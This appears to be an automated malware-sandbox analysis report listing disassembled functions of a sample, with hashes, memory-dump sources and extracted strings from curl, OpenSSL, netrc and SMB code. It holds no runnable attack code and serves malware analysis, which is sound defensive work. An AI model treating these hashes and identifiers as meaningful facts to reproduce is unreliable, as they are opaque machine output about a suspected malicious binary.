                                      Similarity
                                      • API ID:
                                      • String ID: $d$nil)
                                      • API String ID: 0-394766432
                                      • Opcode ID: 87b91de67c2faafe6d71d889f2e86687d5c5684cd5769df2f3a35cc497f0f109
                                      • Instruction ID: f5b27c5b89d6157a34454808258967a81f3ff8197743683ec23669f20cf961d6
                                      • Opcode Fuzzy Hash: 87b91de67c2faafe6d71d889f2e86687d5c5684cd5769df2f3a35cc497f0f109
                                      • Instruction Fuzzy Hash: 731343706083458FD720DF28C08066ABBE5BFC9714F244E2DE9999B3A1D775ED85CB82
                                      Function 00594940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                      • API String ID: 0-122532811
                                      • Opcode ID: c41d5acd89d632ed925eb83579fc2ee3cf10896f6491e8081e60c5a04f92475d
                                      • Instruction ID: d4c12441894196b7f71069dc34a6c8278a0e7e5d82d4866a47242e5f8c89d8b0
                                      • Opcode Fuzzy Hash: c41d5acd89d632ed925eb83579fc2ee3cf10896f6491e8081e60c5a04f92475d
                                      • Instruction Fuzzy Hash: E642F771B08701AFDB08DE28CC45B6BBAEAFBC4704F04892CF55D97291E775AD148B92
                                      Function 005A4F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                      • API String ID: 0-1914377741
                                      • Opcode ID: 993e44b96defb0ecf88d1ae206ffafccbcdc62a3f814de76bbb0eb2aaa796dcf
                                      • Instruction ID: 470e3f7410821a7a2729681ab999d52b34fc66dbffdc486656b3cb2a11a6b67e
                                      • Opcode Fuzzy Hash: 993e44b96defb0ecf88d1ae206ffafccbcdc62a3f814de76bbb0eb2aaa796dcf
                                      • Instruction Fuzzy Hash: CA721931A08B419FE7258A28C445FAA7FD2BF92344F048A2CED855B293F776DD84C751
                                      Function 00740D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                      • API String ID: 0-2550110336
                                      • Opcode ID: 81e29b7b42a3d3871784f0a2d9866f5f51e6c33f09be07fa5a78c3188acd25fb
                                      • Instruction ID: a07ddca823f22772eedcf9855720eac7d998fecf6b5009afe7a7ac2d9bcb2861
                                      • Opcode Fuzzy Hash: 81e29b7b42a3d3871784f0a2d9866f5f51e6c33f09be07fa5a78c3188acd25fb
                                      • Instruction Fuzzy Hash: 6A324770748348EBE724BB209C46F3A77D5AF90B04F544528F944962D3EBBCE994C782
                                      Function 0064EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.$;$?$?$xn--$xn--
                                      • API String ID: 0-543057197
                                      • Opcode ID: 14f5168ee9aa327c6c7b22984cb63c75e041f4b7111935f1e3ed8704634ed9cb
                                      • Instruction ID: 49301d4ab25962ae393fc411c86fdd1e855a76e3565c8a69e045c22630ab341b
                                      • Opcode Fuzzy Hash: 14f5168ee9aa327c6c7b22984cb63c75e041f4b7111935f1e3ed8704634ed9cb
                                      • Instruction Fuzzy Hash: A52205B2A04301AFEB209B24DC41BAB77E6AF91309F04453CF88997292F775DD09C792
                                      Function 0058A960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: facfb42e0ae5174dbe97b6f886923e40bc07acf952be04b77c23337ca83323d3
                                      • Instruction ID: 16b552fe4987bffa452f4eabb2e782b833279198416a3169a22d5136ba631f0d
                                      • Opcode Fuzzy Hash: facfb42e0ae5174dbe97b6f886923e40bc07acf952be04b77c23337ca83323d3
                                      • Instruction Fuzzy Hash: 57C26B316087418FE714DE28C49066ABBE6FFC9314F158A2DEC99AB352D734ED458B82
                                      Function 0058E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: 59b3f855ce341ebcafe954df4bbea384a226d12115164dcb039121918454b32c
                                      • Instruction ID: 8047c8ad1dc5bbdaedb6da3a1abeb7a45a09042ef37f02e5e9faef5c01fc4520
                                      • Opcode Fuzzy Hash: 59b3f855ce341ebcafe954df4bbea384a226d12115164dcb039121918454b32c
                                      • Instruction Fuzzy Hash: 45828C71A083019FD714EE28C88572BBBE1BFC9724F148A2DF9A9A7291D730DC45CB52
                                      Function 005E6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: default$login$macdef$machine$netrc.c$password
                                      • API String ID: 0-1043775505
                                      • Opcode ID: ec515a13f6d96bad1c09f8a2e249d61325dae274c986c88a2d985333335df978
                                      • Instruction ID: bf89d99368edaa635a43bd517dc3874e499148e5bcc35aaadbc3c6fecd605674
                                      • Opcode Fuzzy Hash: ec515a13f6d96bad1c09f8a2e249d61325dae274c986c88a2d985333335df978
                                      • Instruction Fuzzy Hash: B0E125709083919BEB159F12888572BBFE4BFA57C8F18482CF8C557282E3B5DD48C792
                                      Function 00648F90 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 256COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: FreeTable
                                      • String ID: 127.0.0.1$::1
                                      • API String ID: 3582546490-3302937015
                                      • Opcode ID: 5677b1c7bd91604da4e0b39deb8ac323dd39b2f56db376f0fc14085807e35021
                                      • Instruction ID: f0c52de5ee6fb4b523efe63b249f1a063cc18175e3c16d6bb5828c98aab11659
                                      • Opcode Fuzzy Hash: 5677b1c7bd91604da4e0b39deb8ac323dd39b2f56db376f0fc14085807e35021
                                      • Instruction Fuzzy Hash: B8A1C1B1D443829BE700DF24C84576BB3E1AF96304F159629F8888B361F7B1ED90D7A2
                                      Function 005EA7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                      • API String ID: 0-4201740241
                                      • Opcode ID: 46d9c81b44728306b0481481662d55f5b4d104507dadcde393dde56949d59af9
                                      • Instruction ID: 1d7ddcc7f49fd26c6f8c9487c4d85dcbe19a2de4ab287888d042ce8054389475
                                      • Opcode Fuzzy Hash: 46d9c81b44728306b0481481662d55f5b4d104507dadcde393dde56949d59af9
                                      • Instruction Fuzzy Hash: 2062C1B09147819BD718CF25C4907AAB7E4FF98304F04962DE88D8B352E774FA94CB96
                                      Function 0063C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                      • API String ID: 0-3285806060
                                      • Opcode ID: 1b3d25c1418632e1ff8fa7c7c80459387781989699b622f0e11ccbcc852e65d3
                                      • Instruction ID: b1cc0c2bccd19e1bf96928f1684d3cb23da601c299fdc652e97f9d8b8f3e5dfc
                                      • Opcode Fuzzy Hash: 1b3d25c1418632e1ff8fa7c7c80459387781989699b622f0e11ccbcc852e65d3
                                      • Instruction Fuzzy Hash: CAD1F872A083058BD7249F28C8413BAB7D2AF91324F19893DF8D9A73D1EB749945D7C2
                                      Function 0090CC90 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$@$gfff$gfff
                                      • API String ID: 0-2633265772
                                      • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
